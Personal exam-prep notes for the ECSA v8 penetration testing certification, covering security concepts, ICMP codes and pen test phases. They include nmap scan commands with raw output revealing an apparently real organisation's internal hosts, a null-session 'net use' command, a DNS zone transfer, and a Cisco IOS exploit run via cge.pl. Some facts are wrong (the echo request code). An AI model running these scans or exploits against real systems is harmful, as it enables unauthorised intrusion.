Oct 13, 2015
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
ECSA v8
Key learnings/ Take away for Exam
By : Manju Devaraj
Data leaks -> Rogue Employee & Insider Attacker
More than 75% of Budget --> is Non IT/Security
Core Focus in IT security -> AAA & CIA & Non Repudiation .
Risk = loss * exposure factor
IDLE scan - Packet sent to Zombie Computer Open port - packet with PID 31400 ,response will be 31401
.
Metamorphic Virus- code rewrites & signature changes ,but Functionality stays same .
Policies - Promiscuous Policy , Permissive Policy , Prudent, Paranoid policy
Prudent Security Policy Provides max security , all sevices are blocked , nothing is allowed , everything
is logged .
Permissive Security policy Policy begins Wide Open, known dangers & attacks are blocked , impossible
to keep up with current exploits .
Port nos above 1024 , registered for vendor specific applications .
Until 1024 are Well known ports .
Positive acknowledgment with retransmission guarantees reliable delivery of data .
Windowing Improve flow Control & reliability
TCP header fields, IDS , NIDS , IP Fragmentation .to be prepared
Dos Syn Flooding takes advantage of flaw in hosts implement 3 way handshakes.
IDS evasion Techniques are modifications made to attack in order to prevent detection by an IDS.
WIDSs monitors & evaluate user & system activities, identify known attacks, determine abnormal
activity , determine abnormal network activity , policy violation over WLAN , Spoofing & MITM attack .
Password cracking attacks
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Dictionary Dictionary db loaded
Bruteforce tries every combination.
Hybrid works like dictionary but adds some nos & symbols to words in dictionary.
Syllable Combination of Brute force & dictionary
Rule based used when attacker gets some info about password.
____________________________
Passwords are hashed & stored in SAM located in windows\systems32\config\SAM
Linux
/etc/passwd or /etc/shadow
Rainbow tables contains pre-computed hashes of Passwords . Precompiled hash table .
Social Engineering Types
Vishing Scamming users to surrender private info using telephone lines.
Dumpster diving Searching info in disposal areas still yet to be destroyed .
Shoulder Surfing Looking over shoulder to gain/gather info.
Phishing Using fake websites to redirect, emails contains suspicious attachments.
Accomplice method is associated with bribing , handing out gifts , personally involving to
become a friend .
Identity Theft Stealing your name or personal info for fraudulent purpose
Web 2.0 provides more attack surface for web exploitation , SQL injection is the biggest threat to web
2.0
Web spidering tools like Burp Suite used to mirror a target website.
Web Parameter tampering attack involves manipulation of parameters exchanged between client &
server in order to modify application data such as user credential & permissions, price & quantity of
products. Best way to protect web applications from this is to apply effective input field filtering
SQL injection takes advantage of non-validated input vulnerabilities to pass SQL commands through a
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
web application.
LDAP injection attacks are similar to SQL injection attack but exploit user parameter to generate LDAP
query .
In SOAP injection attack, attacker injects malicious query strings into the user filed to bypass Service
authentication mechanisms & access backend db .
Functional Testing falls within the scope of black box testing; & its now required to have the knowledge
of inner design of the code or logic.
SQL injection Vulnerabilities:
Detect SQL injection issues
Detect input Sanitization
Detect Truncation issues
Detect SQL modification issues
Challenges to IT Security .
Environment complexity - Insecure Network Design , Multivendor Environment
New Technologies - Tunnel to Bypass access Controls .
New Threats & Exploits - Avg every 4 hours new threats are discovered .
Limited focus on Security .
Limited security expertise .
Environmental Complexity
firewalk
Tries to discover firewall rules using an IP TTL expiration technique known as firewalking.
nmap --script=firewalk --traceroute 64.54.40.3.2
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms
While doing Pen Test
Create a log of all actions , results & Findings.
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
http/1.1 error page msg code 407 - > Proxy Auth required
ICMP
Type 3 Code 3 -> Dest port unreachable
Type 3 Code 2 -> Dest protocol unreachable
Type 3 code 13 -> adminstratively blocked
Type 0 Code 0 - echo reply
Type 0 code 8 - Echo Request
Codes:
0 Net Unreachable
1 Host Unreachable
2 Protocol Unreachable
3 Port Unreachable
4 Fragmentation Needed and Don't Fragment was Set
5 Source Route Failed
6 Destination Network Unknown
7 Destination Host Unknown
Pentest is actively evaluating the security of an information system or network by simulating an attack .
Goes one step further then vulnerability testing .Adapts indept ethical hacking .
Blue Team - Test ran with the knowledge of org's IT staff .
Red Team - Pentest ran Without knowledge of (informing the) IT staff , but with conscent of Upper
Mgmt .
Pen Testing Types
Black box - Blind testing & doube blind - no knowldg of infra. before .
white Box - Announced & unannounced - Has completed knowldg of infra.
Grey Box - Combination of Black box & unannounced testing - Limited knowl.
Pen Test Phases
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Pre-attack Phase - Passive Reconnaissance & Active reconn
Attack Phase - Perimiter , Web Application & Wireless Testing ..etc
Post attack phase -Removing all files & cleaning registry
Network Security Assessment Activity in Attack phase - > Identifies Vulnerabilities & helps to improve
Enterprise Security Policy .
Application Security Assessment -> Source code Review , Authorization Testing , Functionality Testing ,
Web penetration Testing .
Legal Agreement - > Scope of project & Consent of Company .
Rule of Engagement/behavior -> requires Signature from both Pen tester & the Company .
Pen Test Pricing Report -> No. of Client Computer/IP's to be Tested & Resource Required , Time to Finish
the project .
Tiger Team -> A Group of People hired to give details of the Vulnerabilities present in the system .
Passive info gathering - >From Public Sources Eg: Using Netcraft
Active info Gath -> Social engineering , on-site visits , face -to face interviews & Tools . Eg : Using
Nessus ( makes too much noise ) .
Nessus - Scripting launguage is NASL which can be used to create Custom Scripts .
Filetype:ppt -> finds ppts on Google
Gramm-Leach-Bliley Act - > protect consumers personal financial information held by financial
institutions and their service providers .
Family Educational Rights and Privacy Act (FERPA) for Students.
Active IDS - IDS cuts off your connection ,when running a vulnerability scan on a network .
Google Search hackrouter.com -> will produce all sites that links to the hackrouter.com .
XMAS scan most of the ports scanned do not give a response - Porsts are in Open state .
DNS Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR).
>dig example.com axfr
When a DNS zone transfer is allowed, you should get a complete listing of all DNS entries that have been
made in the DNS server for this domain. If the DNS server doesn't allow it, you will get an error
indicating that the Zone transfer didn't work.
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Source & Destination port in TCP header 16 bits - > 2^16 = 65536
Ack no./Sequence No. -> 32 Bit
Winxp Repair Risk ->Pressing Shift+F10 gives the user administrative rights.
Null Session hijacking
>net use \\10.10.2.225\ipc$ "" "/user:"
>net use
Glean information - ith a null session connection, you can now use other utilities to gather critical
Windows information remotely. Dozens of tools can gather this type of information.
net view \\10.10.2.225
Winfo and DumpSec can gather useful information about users and configurations, such as
Windows domain to which the system belongs
Security policy settings
Local usernames
Drive shares
Countermeasures against null session hacks
Block NetBIOS on your Windows server by preventing these TCP ports from passing through your
network firewall or personal firewall:
139 (NetBIOS sessions services)
Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine's
Restrict anonymous connections to the system.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous to a DWORD value
as follows:
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
None: This is the default setting.
Rely on Default Permissions (Setting 0): This setting allows the default null session connections.
Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This is the medium security
level setting. This setting still allows null sessions to be mapped to IPC$, enabling such tools as
Walksam to garner information from the system.
No Access without Explicit Anonymous Permissions (Setting 2): This high security setting
prevents null session connections and system enumeration.
Nmap Vulnerability scanning
nmap -sV --script=vulscan www.example.com Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
@echo Courtesy manju Devaraj
cd C:\Program Files\Nmap
cmd /c nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 10.186.27.1-254 >
c:\temp\10.186.27.0.txt
nmap -iL c:\temp\ips.txt -sn -PS
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:1C:F5 (VMware)
Nmap scan report for 10.186.27.5
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:56:F4 (VMware)
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up (0.00s latency).
MAC Address: 00:50:56:A5:75:57 (VMware)
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Nmap done: 9 IP addresses (3 hosts up) scanned in 3.25 seconds
#########################################################
HOST DISCOVERY:
-PO[protocol list]: IP Protocol Ping
-Pn: Treat all hosts as online -- skip host discovery
##########################################################
nmap -iL c:\temp\ips.txt -sn -P0
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:46 Eastern Standard
Nmap scan report for 10.186.27.1
Host is up.
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up.
Nmap scan report for 10.186.27.3
Host is up.
Nmap scan report for 10.186.27.4
Host is up.
Nmap scan report for 10.186.27.5
Host is up.
Nmap scan report for 10.186.27.6
Host is up.
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up.
Nmap scan report for 10.186.27.8
Host is up.
Nmap scan report for 10.186.27.9
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Host is up.
Nmap done: 9 IP addresses (9 hosts up) scanned in 0.27 seconds
nmap -iL c:\temp\ips.txt -P0 -sU -p139,445,139,80 -v
C:\Program Files\Nmap>nmap -iL c:\temp\ips.txt -P0 -sU -p1-500
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 05:57 Eastern Standard Time
Nmap scan report for phsv-rdscb2.ghmh.org (10.186.27.2)
Host is up (0.00s latency).
Not shown: 495 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:1C:F5 (VMware)
Nmap scan report for 10.186.27.5
Host is up (0.00s latency).
Not shown: 493 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
162/udp open|filtered snmptrap
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:56:F4 (VMware)
Nmap scan report for phsv-print1.ghmh.org (10.186.27.7)
Host is up (0.00s latency).
Not shown: 495 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
500/udp open|filtered isakmp
MAC Address: 00:50:56:A5:75:57 (VMware)
Nmap done: 9 IP addresses (3 hosts up) scanned in 309.64 seconds
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -Pn -p 80
! iR - > random Targets
nmap -iL c:\temp\ips.txt -P0 -sU -p1-1024 -vv -sV -O
! UDP scan - port range , double verbose , SV - probe to determine version of service , version of OS
Xmas scan (-sX)
Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
These three scan types are exactly the same in behavior except for the TCP flags set in probe packets. If
a RST packet is received, the port is considered closed, while no response means it is open|filtered. The
port is marked filtered if an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is received.
C:\Program Files\Nmap>nmap -sR 10.186.27.12 -P0 -sT -p1-1024 -vv -sV -O
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
WARNING: -sR is now an alias for -sV and activates version detection as well as
RPC scan.
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 06:31 Eastern Standard Time
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 06:31
Scanning 10.186.27.12 [1 port]
Completed ARP Ping Scan at 06:31, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:31
Completed Parallel DNS resolution of 1 host. at 06:31, 0.00s elapsed
Initiating Connect Scan at 06:31
Scanning 10.186.27.12 [1024 ports]
Discovered open port 135/tcp on 10.186.27.12
Discovered open port 445/tcp on 10.186.27.12
Discovered open port 139/tcp on 10.186.27.12
Completed Connect Scan at 06:32, 45.91s elapsed (1024 total ports)
Initiating Service scan at 06:32
Scanning 3 services on 10.186.27.12
Completed Service scan at 06:32, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.186.27.12
NSE: Script scanning 10.186.27.12.
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 10.186.27.12
Host is up (0.00s latency).
Scanned at 2013-11-13 06:31:59 Eastern Standard Time for 53s
Not shown: 1021 filtered ports
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open netbios-ssn
MAC Address: 00:50:56:A5:75:3A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 o
pen and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:mic
rosoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, or Windows 8
TCP/IP fingerprint:
OS:SCAN(V=6.40%E=4%D=11/13%OT=135%CT=%CU=34426%PV=Y%DS=1%DC=D%G=N%M=005056%
OS:TM=52836364%P=i686-pc-windows-windows)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I
OS:%II=I%SS=S%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B
OS:4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%
OS:W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=
OS:Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q
OS:=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%
OS:A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%
OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD
OS:=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 7.366 days (since Tue Nov 05 21:45:37 2013)
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: C:\Program Files\Nmap
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds
Raw packets sent: 17 (1.446KB) | Rcvd: 17 (1.358KB)
C:\Program Files\Nmap>
Form Scalpel used for Dissecting HTML Forms , tool can extract all HTML forms from pages .
BackTrack to exploit Cisco IOS vlunerability
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl
Usage :
perl cge.pl
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3
Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...
/level/$NUMBER/exec/show/config/cr
where $NUMBER is an integer between 16 and 99.
root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....
http://10.10.0.21/level/99/exec/show/config
Click cancel to the logon box and enter the following address:
Error! Hyperlink reference not valid.
Information technology risk
Risk = Threat Vulnerability Asset Value
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Fuzzing Attack - Injection Technique
A fuzzer is a program which injects automatically semi-random data into a program/stack and detect
bugs.
The Fuzzing Scan does just as described above; it generates totally random input for the specified
request parameters for a specified number of requests, hoping to provoke some kind of unexpected . By
default the generated values will be between 5 and 15 characters in lenght and mutated 100 times;
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Inputting Massive Amount of Data to Crash the Web Application .
Dumb Fuzz Testing
Smart Fuzz Testing - Knowing underlying structure of database supply huge inputs
accoordingly .
Rough hints v8
Rough hints v8
ECSA V8 key Learnings Hints for Exam
[email protected] Hints Manju Devaraj
Anonymiser - can be used to get around the Blocked access
Information Vulnerability - Job Posting's other postings exposing the information about the Technology
.
Citrix Server's Port - 2598 is used to scan a network to find the Citrix machines .
Stacheldraht
The original DDOS tool "Stacheldraht" - a German word means 'Barbed wires' - is released during the
middle of 1999.
The Stacheldraht works on most Solaris and Linux system. The original Stacheldraht, written by hacker
'randomizer', was found to be running on most of the Solaris platform because the Linux version is quite
broken.
Stacheldraht by itself is a malicious program that covers its track within a compromised system and
communicates by covert channel and encryption on the network. The attacker could control hundreds
or thousands of compromised system via a single command line interface and launch different types of
DDOS attack to victim afterward. It combines the features available from Trinoo, TFN and adds some
new DDOS attacks.
http://packetstormsecurity.com/distributed
Common Vulnerabilities and Exposures (CVE) - Submit the IDS Logs for any new vulnerability .
Software Firewalls operate at DLL .
Rough hints v8